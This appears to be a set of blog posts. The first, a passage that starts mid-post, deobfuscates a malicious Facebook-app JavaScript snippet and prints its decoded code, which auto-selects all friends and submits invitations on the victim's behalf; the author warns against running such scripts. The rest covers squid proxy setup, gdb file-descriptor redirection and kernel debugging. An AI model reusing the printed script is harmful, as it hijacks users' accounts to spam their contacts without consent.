 ('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{})
);

Now, instead of passing the unpacked string to eval, let us store it in a variable and print it, to check what code this actually executes:

a = "app120196878004524_jop";
b = "app120196878004524_jode";
ifc = "app120196878004524_ifc";
ifo = "app120196878004524_ifo";
mw = "app120196878004524_mwrapper";
function ff(p, a, c, k, e, r) {
 e = function (c) {
  return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36));
 };
 if (!"".replace(/^/, String)) {
  while (c--) {r[e(c)] = k[c] || e(c);}k = [function (e) {return r[e];}];e = function () {return "\\w+";};c = 1;
 }
 while (c--) {
  if (k[c]) {p = p.replace(new RegExp("\\b" + e(c) + "\\b", "g"), k[c]);}
 }
 return p;
}
str = ff("J e=[\"\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A\",\"\\j\\h\\A\\i\\f\",\"\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t\",\"\\w\\g\\t\\t\\f\\k\",\"\\g\\k\\k\\f\\x\\M\\N\\G\\O\",\"\\n\\l\\i\\y\\f\",\"\\j\\y\\o\\o\\f\\j\\h\",\"\\i\\g\\H\\f\\r\\f\",\"\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j\",\"\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h\",\"\\p\\i\\g\\p\\H\",\"\\g\\k\\g\\h\\q\\n\\f\\k\\h\",\"\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h\",\"\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i\",\"\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r\",\"\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z\",\"\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o\"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);", 62, 69, "||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||".split("|"), 0, {});

// and let's print the string that gets evaluated
print(str);

which, when executed with `js' gives output

var _0x95ea=[ "\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79",
"\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64",
"\x68\x69\x64\x64\x65\x6E",
"\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65",
"\x73\x75\x67\x67\x65\x73\x74",
"\x6C\x69\x6B\x65\x6D\x65",
"\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73",
"\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74",
"\x63\x6C\x69\x63\x6B",
"\x69\x6E\x69\x74\x45\x76\x65\x6E\x74",
"\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74",
"\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C",
"\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D",
"\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70",
"\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];
d=document;
d[_0x95ea[2]](mw)[_0x95ea[1]][_0x95ea[0]]=_0x95ea[3];
d[_0x95ea[2]](a)[_0x95ea[4]]=d[_0x95ea[2]](b)[_0x95ea[5]];
s=d[_0x95ea[2]](_0x95ea[6]);
m=d[_0x95ea[2]](_0x95ea[7]);
c=d[_0x95ea[9]](_0x95ea[8]);
c[_0x95ea[11]](_0x95ea[10],true,true);
s[_0x95ea[12]](c);
setTimeout(function(){fs[_0x95ea[13]]()},5000);
setTimeout(function(){SocialGraphManager[_0x95ea[16]](_0x95ea[14],_0x95ea[15])},5000);
setTimeout(function(){m[_0x95ea[12]](c);d[_0x95ea[2]](ifo)[_0x95ea[4]]=d[_0x95ea[2]](ifc)[_0x95ea[5]]},5000);
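
For readers without a js shell handy, the substitution that ff performs can be sketched in Python. This is a rough port under assumptions, not the packer's own code: the names token and unpack are made up here, and the dictionary holds only a handful of entries copied from the packed call above, with every other slot left empty.

```python
import re

DIGITS36 = "0123456789abcdefghijklmnopqrstuvwxyz"

def token(c, a=62):
    """Port of the packer's e(c): write dictionary index c as a base-a token."""
    prefix = "" if c < a else token(c // a, a)
    c %= a
    return prefix + (chr(c + 29) if c > 35 else DIGITS36[c])

def unpack(p, a, c, k):
    """Replace each whole-word token in p with its dictionary entry, if any."""
    for i in range(c - 1, -1, -1):
        if k[i]:
            pattern = r"\b" + re.escape(token(i, a)) + r"\b"
            p = re.sub(pattern, lambda m, word=k[i]: word, p)
    return p

# Hypothetical, cut-down dictionary: 69 slots like the original, but only the
# entries needed for one statement are filled in.
k = [""] * 69
k[14], k[38], k[39], k[40], k[58] = "_0x95ea", "setTimeout", "function", "5000", "fs"

print(unpack("C(D(){W[e[13]]()},E);", 62, 69, k))
# prints: setTimeout(function(){fs[_0x95ea[13]]()},5000);
```

Tokens whose dictionary slot is empty (such as 13 here) are left untouched, which is why the digits and the variables a, b, c and d survive in the unpacked script.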

note that executing print(_0x95ea); gives

visibility,style,getElementById,hidden,innerHTML,value,suggest,likeme,MouseEvents,createEvent,click,initEvent,dispatchEvent,select_all,sgm_invite_form,/ajax/social_graph/invite_dialog.php,submitDialog
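
The same decoding can be done without a js shell. A small Python sketch (the helper name decode_hex_escapes is made up for illustration) that turns the \xNN escapes back into readable text:

```python
import re

def decode_hex_escapes(text):
    """Turn every \\xNN escape in text into the character it encodes."""
    return re.sub(r"\\x([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1), 16)),
                  text)

# Two entries copied from the _0x95ea array above (raw strings keep the
# backslashes literal instead of letting Python decode them itself).
print(decode_hex_escapes(r"\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79"))  # visibility
print(decode_hex_escapes(r"\x63\x6C\x69\x63\x6B"))                      # click
```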

so, the final code that gets executed is

document["getElementById"]("app120196878004524_mwrapper")["style"]["visibility"]="hidden";
document["getElementById"]("app120196878004524_jop")["innerHTML"]=document["getElementById"]("app120196878004524_jode")["value"];
s=document["getElementById"]("suggest");
m=document["getElementById"]("likeme");
c=document["createEvent"]("MouseEvents");
c["initEvent"]("click",true,true);
s["dispatchEvent"](c);
setTimeout(function(){fs["select_all"]()},5000);
setTimeout(function(){SocialGraphManager["submitDialog"]("sgm_invite_form","/ajax/social_graph/invite_dialog.php")},5000);
setTimeout(function(){m["dispatchEvent"](c);document["getElementById"]("app120196878004524_ifo")["innerHTML"]=document["getElementById"]("app120196878004524_ifc")["value"]},5000);

Essentially, the script automatically brings up the `suggest to friends' window listing all your friends, selects all of them and submits the invitation request on your behalf (by dispatching synthetic click MouseEvents, with the follow-up steps delayed through setTimeout).

Note that the code template is the same for all applications of this kind. Just the application specific IDs ("app120196878004524_jop" etc.) change.

In general, whenever someone asks you to execute some piece of javascript in the address bar, consider it harmful. In this case they do not steal your identity, so no worries; but you have every reason to believe the next such application will.

Take care.

Wednesday, May 05, 2010

Authenticated corporate proxy woes - Local squid cache peer proxy

How many times has it happened at school or work that the software you want to use needs to connect to the Internet but can not get through the stupid proxy? I know I've suffered a lot due to this. Moreover, it looks like companies such as Nokia, Ubisoft etc. do not really care about people behind authenticated proxies either. It is really surprising (and annoying) to see so much nice software without support for authenticated proxies. That also includes Empathy, the all new `awesome' (sarcasm intended) chat client that comes by default in Ubuntu.

Or are you otherwise pissed off because you have to type your proxy authentication in all those different places? There are KDE settings, GNOME settings, (e)links, subversion config, yum/apt configuration, entering the password a thousand times when firefox (pre-3.6) tries to find updates after a restart and reopens all those tabs, etc. etc. For windows users there are the IE settings and the "netsh winhttp set proxy" method to get your Windows 7 updates through the proxy.

Yes. Very, very annoying.

What if you could delegate the authentication to some other service running on and strictly for your computer only? How about your own proxy server running on your machine that delegates requests to your organization's proxy with proper authentication so that you no longer have to worry about authentication?

Running local squid

The basic idea is this : we run a local instance of squid that uses the organization's proxy as its parent (cache peer) and authenticates to it on your behalf. This means that you can now set localhost as your proxy and connect; the authentication will be taken care of by the local squid. Not just that, it also takes some load off your organization's proxy, as it caches content too (static content by default).

Just append these lines to your /etc/squid/squid.conf

cache_peer proxy.addr parent [proxy.addr proxy port] [proxy.addr icp port] default no-query login=[login_name]:[pass]

# to bypass the proxy for local or LAN access
acl local_domain dstdomain .local.domain
acl local_nat dst 10.0.0.0/8
always_direct allow local_domain
always_direct allow local_nat

# everything else must pass through the parent. No direct access allowed.
never_direct allow all

Let us dissect the config:
  • cache_peer proxy.addr tells squid to use your organization's proxy (proxy.addr) as a cache peer.
  • parent tells squid that proxy.addr is one of its parents in the cache hierarchy.
  • [proxy.addr proxy port] is the port on which the organization's proxy accepts connections.
  • [proxy.addr icp port] is the port on which the organization's proxy listens for ICP requests.
Now the options:
  • default marks this parent as the last-resort peer to use when no other peer can be selected.
  • no-query stops our squid from sending ICP requests to this peer. Use it in case your proxy does not provide ICP support, or you do not want to enable it; it also avoids unnecessary delays.
  • login=[login_name]:[pass] is the login and password our squid sends to the parent on your behalf.

Note that you need to take care of forwarding any special ports your applications might need.

This method works only for HTTP basic authentication (where the login and password are sent base64 encoded).
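
To see what basic authentication boils down to, here is a minimal Python sketch of the header that gets sent to the parent proxy with each request. The function name and the user/pass credentials are placeholders made up for illustration; they are not taken from squid.

```python
import base64

def proxy_basic_auth_header(login, password):
    """Build the Proxy-Authorization header used by HTTP basic authentication."""
    credentials = f"{login}:{password}".encode("utf-8")
    return "Proxy-Authorization: Basic " + base64.b64encode(credentials).decode("ascii")

print(proxy_basic_auth_header("user", "pass"))
# prints: Proxy-Authorization: Basic dXNlcjpwYXNz
```

Base64 is an encoding, not encryption: anyone who sees the header can decode it back to the login and password.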

There are some obvious security concerns. First, your password is stored in plaintext, so make sure that non-root users have *no* permissions on /etc/squid/squid.conf. Also make sure that this proxy accepts connections only from localhost. There still is a security hole: anyone who logs into your machine, even as a normal or guest user, can use your connection too.
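
A quick way to check the permissions is a few lines of Python. This is only a sketch: the helper name is made up, and it looks at the classic permission bits only (no ACLs).

```python
import os
import stat

def readable_by_non_owner(path):
    """Return True if group or other users have any permission bits on path."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IRWXG | stat.S_IRWXO))

if __name__ == "__main__":
    conf = "/etc/squid/squid.conf"  # path used in this post; adjust for your install
    if os.path.exists(conf):
        print(conf, "is exposed" if readable_by_non_owner(conf) else "is private")
```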

This method works on all UNIces, Linux as well as Windows.

Wednesday, April 14, 2010

Continue running a non nohup-ed command after logout (no SIGHUP)

Many times it happens that you start a command that takes a fairly long time to complete, and before it ends, you must log out for some reason - maybe the network will go down soon or you do not want to keep staring at the screen till it completes, or you just don't want to keep that terminal around.

A bit of shell behaviour for the uninformed. When you launch a command in a shell, the new process is created by fork()ing the current shell and immediately exec()ing the command executable/binary, which means the new process is a child of the shell process. You can suspend the running process and then let it continue in the background as

% java some.long.running.application
{java program spits out something}
{hit ^z}
^Z
zsh: suspended  java some.long.running.application
% bg
[1]  + continued  java some.long.running.application

or you can start it in background as

% java some.long.running.application &
[1]  1001
{java program spits out something}

of course you can bring these jobs in foreground any time you want

% jobs
[1]  - running    iostat -xd 100
[2]  + running    java some.long.running.application
[3]  + suspended  ~/bin/startOfflineIMAP.sh
% fg %2 {bash users may drop the %}
[2]    running    java some.long.running.application
{java program spits out something}

Now you want to log out. The moment you log out of the terminal, the shell process sends the SIGHUP signal to all its running children, and SIGCONT followed by SIGHUP to all its stopped children. The default behaviour of an application on receiving SIGHUP is to exit, so any applications, foreground as well as background, that were started from this shell are killed. We want our application to survive after logout.
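
The difference between the default and the ignored handling of SIGHUP can be tried out with a small Python sketch. It is only an illustration under assumptions: the helper name is made up, the `child' is just a Python process that sleeps, and the signal is sent by the script itself rather than by a shell at logout.

```python
import signal
import subprocess
import sys

SLEEPER = [sys.executable, "-c", "import time; time.sleep(30)"]

def survives_sighup(ignore):
    """Start a sleeping child, send it SIGHUP, report whether it is still alive."""
    handler = signal.SIG_IGN if ignore else signal.SIG_DFL
    # preexec_fn runs in the child between fork() and exec(); an ignored (or
    # default) signal disposition set there is kept across exec().
    child = subprocess.Popen(
        SLEEPER, preexec_fn=lambda: signal.signal(signal.SIGHUP, handler))
    child.send_signal(signal.SIGHUP)
    try:
        child.wait(timeout=1)
        return False          # the child exited: SIGHUP killed it
    except subprocess.TimeoutExpired:
        return True           # still running one second later
    finally:
        if child.poll() is None:
            child.kill()
            child.wait()

if __name__ == "__main__":
    print("default SIGHUP handling, survives:", survives_sighup(ignore=False))
    print("SIGHUP ignored, survives:", survives_sighup(ignore=True))
```

The first child should die and the second should survive, and making the second case happen is the job of the tricks that follow.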

The textbook way of doing this is to start the command with `nohup' as

% nohup java some.long.running.application &
[1] 1001
% logout

or the subshell trick :

% (java some.long.running.application &)
% {prompt returns, java disowned}
{java program spits out something}

zsh users can do it as :

% java some.long.running.application &!
% {prompt returns, java disowned}
{java program spits out something}

Or use the good old screen (my favorite)!

Unfortunately you did not start the process with nohup or the subshell trick, and say the process can not be restarted for some reason, or it has done significant work already.

What if we could tell the shell not to send SIGHUP to a particular child?
`disown' command lets you do just that! :D

% jobs
[1]  - running    iostat -xd 100
[2]  + running    java some.long.running.application
[3]  + suspended  ~/bin/startOfflineIMAP.sh
% disown %2 {bash users can use disown -h %2 to keep the job in the job table}
{java program spits out something}

This tells the shell not to send SIGHUP to our precious java process. And you'd think you can now happily log out with java process still running.

Well, not quite. Say the shell has pid 1000 and java process has pid 1001, then

% ls -l /proc/1000/fd
total 0
lrwx------. {...} 0 -> /dev/pts/1
lrwx------. {...} 1 -> /dev/pts/1
lrwx------. {...} 2 -> /dev/pts/1

% ls -l /proc/1001/fd
total 0
lrwx------. {...} 0 -> /dev/pts/1
lrwx------. {...} 1 -> /dev/pts/1
lrwx------. {...} 2 -> /dev/pts/1


Which means process 1001 uses terminal /dev/pts/1 as its stdin, stdout and stderr. Even if we disown the java process, when the shell quits, terminal device /dev/pts/1 will no longer be available, and hence the next read or write by the java process on any of stdin/stdout/stderr will fail and will probably result in an abort. Even if it does not abort, you might want to capture stdout and stderr of the program somewhere, to a file maybe, and possibly feed some file to it as input. That is not possible as

% ls -l /proc/1001/fd
total 0
lrwx------. {...} 0 -> /dev/pts/1 (deleted)
lrwx------. {...} 1 -> /dev/pts/1 (deleted)
lrwx------. {...} 2 -> /dev/pts/1 (deleted)

Sad, isn't it?

Not quite!

Let us analyze how nohup works. If the output of nohup is not redirected to some file, by default all the output of the nohup-ed program goes to some default file (such as $PWD/nohup.out or $HOME/nohup.out). In any case, nohup has a writeable file descriptor to the file where the output is supposed to go. Before exec()ing the command, nohup sets SIGHUP to be ignored and duplicates this fd onto stdout and stderr using dup2(). This way, the process can keep running after its parent shell is gone (which means its parent becomes pid 1), as the stdout and stderr fds are still valid: they no longer refer to the terminal of the parent shell but to some real file that was opened. Stdin is probably uncared for, as we are running the process in background, non-interactive mode after all.
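
The redirection part can be sketched in a few lines of Python. This is not nohup's source, just an illustration of the open() + dup2() idea: the function names are made up, and the fork() is done by the sketch itself, playing the role of the shell.

```python
import os
import sys
import tempfile

def redirect_output(path):
    """Point stdout (fd 1) and stderr (fd 2) at path, appending to it."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_APPEND, 0o644)
    os.dup2(fd, 1)
    os.dup2(fd, 2)
    if fd > 2:
        os.close(fd)  # fds 1 and 2 keep the file open

def run_redirected(argv, path):
    """fork(), redirect in the child, then exec() the command; returns the pid."""
    pid = os.fork()
    if pid == 0:
        try:
            redirect_output(path)
            os.execvp(argv[0], argv)
        finally:
            os._exit(127)  # only reached if the redirect or the exec failed
    return pid

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        out = os.path.join(tmp, "output")
        pid = run_redirected([sys.executable, "-c", "print('hello from the child')"], out)
        os.waitpid(pid, 0)
        with open(out) as f:
            print(f.read(), end="")
```

The exec()ed program never notices: it simply inherits fds 1 and 2 that already point to the file.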

The question is : all this is fine as it is done _before_ starting the java process. What can we do to change its stdout and stderr _after_ it has been launched already?
Note that we can not modify /proc/1001/fd/1 to link to some real file (me wonders what issues would creep up if it was allowed).

Our good old friend gdb comes to the rescue! The solution is trivial. Just attach to the process, open the file you want the output to go to from within that program with open(), and dup2() the new fd to 1 and 2 :D

% gdb -p 1001
....
Attaching to process 1001
Reading symbols from /usr/bin/java...(no debugging symbols found)...done.
...
(gdb) call open("/home/prashant/tmp/output", O_WRONLY | O_CREAT | O_APPEND, 0644)
$1 = 5
(gdb) call dup2(5,1)
$2 = 1
(gdb) call open("/home/prashant/tmp/output.err", O_WRONLY | O_CREAT | O_APPEND, 0644)
$3 = 6
(gdb) call dup2(6,2)
$4 = 2
(gdb) detach 
Detaching from program: /usr/bin/java, process 1001
(gdb) quit
%

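In case debug info is not available, you can replace the O_ macros with their actual values from fcntl.h. The values are platform specific: on x86 Linux, O_WRONLY | O_CREAT | O_APPEND is 0x441 (0x209 is the value on BSD-derived systems).

...
(gdb) call dup2(open("/home/prashant/tmp/output", 0x441, 0644),1)
$2 = 1
(gdb) call dup2(open("/home/prashant/tmp/output.err", 0x441, 0644),2)
$3 = 2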
(gdb) detach
...
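
Rather than looking the numbers up in fcntl.h by hand, you can let Python compute them and assemble the gdb command line for you. This is a sketch under assumptions: the function name and the /tmp paths are made up, the flag value is only right if the script runs on the same platform as the target process, and the (int) casts are there because newer gdb versions refuse to call a function whose return type they do not know.

```python
import os

def gdb_redirect_argv(pid, out_path, err_path):
    """Build a gdb command line that reopens fds 1 and 2 of a running process."""
    # Numeric value of the flags on the machine running this script; it must be
    # the same platform as the target process.
    flags = os.O_WRONLY | os.O_CREAT | os.O_APPEND

    def call(path, fd):
        # The (int) casts tell gdb the return types when debug info is missing.
        return f'call (int) dup2((int) open("{path}", {flags:#x}, 0644), {fd})'

    return ["gdb", "-p", str(pid), "-batch",
            "-ex", call(out_path, 1),
            "-ex", call(err_path, 2),
            "-ex", "detach"]

print(" ".join(gdb_redirect_argv(1001, "/tmp/output", "/tmp/output.err")))
```

The returned list can be handed to subprocess.run() as is, or the printed line can be pasted into a shell after quoting the -ex arguments.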

Note that you can redirect stdout and stderr to the same file if you wish (just be careful with append mode on NFS and truncate mode in general ;).

And that's about it. Go ahead and log out. Your process should be busy while you are gone.

PS : this will work as long as the program does not try to read anything from stdin. If and when it does, it may crash depending on whether the program abort()s when it can not do basic IO on fds 0,1 and 2. You might want to open another file to read and use dup2() in similar way if you plan to provide input from a file.

Monday, March 29, 2010

Debugging kernel with qemu and gdb

Assuming that you have your (or Linux/*BSD/Solaris/Windows or any other) kernel on a bootable device, you can debug the kernel and also the loadable modules as well as user mode applications with QEmu/Bochs and good old gdb.
  • Configuring QEmu
You need qemu compiled with gdb support. QEmu needs no configuration file as such, and can be launched with gdb support as:
qemu -hda hd.img -fda floppy.img -boot ac -m 512M -S -gdb tcp::5022
After this, qemu will not start executing the VM right away: because of -S it stays paused before the first instruction and waits for a gdb remote connection on tcp 5022.
  • Configuring bochs
bochs is one of the most popular emulators in the hobbyist x86 kernel developers' world. Again, you need bochs which was configured and compiled with gdb stub. Some distributions like Fedora have a separate package for bochs with gdb stub, in case you do not want to go through the trouble of compiling it yourself.

Bochs needs a configuration file for launching a VM. Assuming you know the basic syntax, go ahead and add the following :
gdbstub: enabled=1, port=5022, text_base=0, data_base=0, bss_base=0
Adjust the segment bases according to the bases of your segments. If you are following a flat memory model, pin them to 0.
After starting with this config, bochs will wait for a gdb connection even before the first instruction in BIOS trampoline is executed. This way you can debug a bootloader, and also your custom bios!
  • GDB
Obviously you need to compile what you plan to debug (be it kernel, user libs, user apps) with a good amount of debug information. -g3 with gcc is my default. Needless to say, do not strip the binaries.

Start up gdb.

The following tells gdb to read debug info from the kernel image 'krnl/kernel'.
file krnl/kernel

This tells gdb to make a remote connection to tcp 5022, the port on which either qemu or bochs is already waiting.
target remote localhost:5022

In order to debug user mode apps, also load their symbols at the address where the app is loaded (0x04000000 here),
add-symbol-file apps/testApp1.elf 0x04000000
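
For the curious: what gdb speaks over that tcp connection is its remote serial protocol, in which every packet is framed as $payload#checksum, the checksum being the sum of the payload bytes modulo 256 written as two hex digits. A tiny Python sketch of the framing (the function name is made up; this is not a full client, it only builds packets):

```python
def frame_packet(payload):
    """Wrap payload in GDB remote serial protocol framing: $payload#checksum."""
    checksum = sum(payload.encode("ascii")) % 256
    return f"${payload}#{checksum:02x}"

print(frame_packet("?"))  # $?#3f  (ask why the target stopped)
print(frame_packet("g"))  # $g#67  (read the general registers)
```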

There you go. Now you can pretty much debug the entire system, so to speak. Almost all common gdb features like breakpoints, watchpoints, assembly level debugging etc. work without a sweat. If your fingers hurt, put all these commands in a file named '.gdbinit' in your project directory. gdb will pick it up, load the symbols and connect automatically.

This can save a hobby kernel developer gazillions of man hours. Believe me, printk debugging is no fun. Source level kernel debugging is a must when you are writing IDT handling code. When writing interrupt handlers and paging, I have wasted two weekends in the pleasing company of triple faults, completely clueless.

For the sickle minded and the general wannabe h4x0r, you just got a (way more) powerful alternative to rootkits. Rev those dongles and drivers. Let your imagination run wild ;)